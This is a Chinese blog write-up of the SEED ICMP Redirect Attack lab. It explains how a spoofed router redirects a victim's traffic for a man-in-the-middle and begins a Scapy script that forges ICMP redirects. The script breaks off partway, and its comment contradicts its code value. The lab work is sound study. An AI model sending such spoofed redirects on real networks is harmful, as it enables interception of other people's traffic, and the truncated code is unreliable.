ICMP Redirect Attack Lab(SEED实验)

ICMP Redirect Attack Lab(SEED实验)

ICMP重连就是我们伪装的路由器通过报文告诉受害者,发向某个方向的报文不应发给另一个路由器,而应该发给我们,并以此截获受害者的报文,实现MITM

环境配置

在这里插入图片描述

Task 1 发起ICMP重连

在目前的Ubuntu系统中已经默认拒绝了ICMP报文的接收,用以防范这种重连攻击。为了复现攻击方式,实验设置已经替我们打开了受害者主机的接收功能:
在这里插入图片描述
但同时,受害者主机也已经配置了192.168.60.0/24的报文发送方向,并不是我们的伪装路由。我们当前的工作就是告诉受害者他的方向错误了。
ICMP报文类型参考,这里应该选择type = 5, code = 0
实验手册提供了一个ICMP_redirect报文骨架,对其进行修改后的执行代码:

#!/usr/bin/python3
from scapy.all import *

Ma_IP = '10.9.0.111'
Router_IP = '10.9.0.11'
Victim_IP = '10.9.0.5'
Network_IP = '192.168.60.5'

ip = IP(src = Router_IP , dst = Victim_IP )
icmp = ICMP(type=5, code=1)# type 5 code 0 for redirect host
icmp
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

winnower-sliff

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值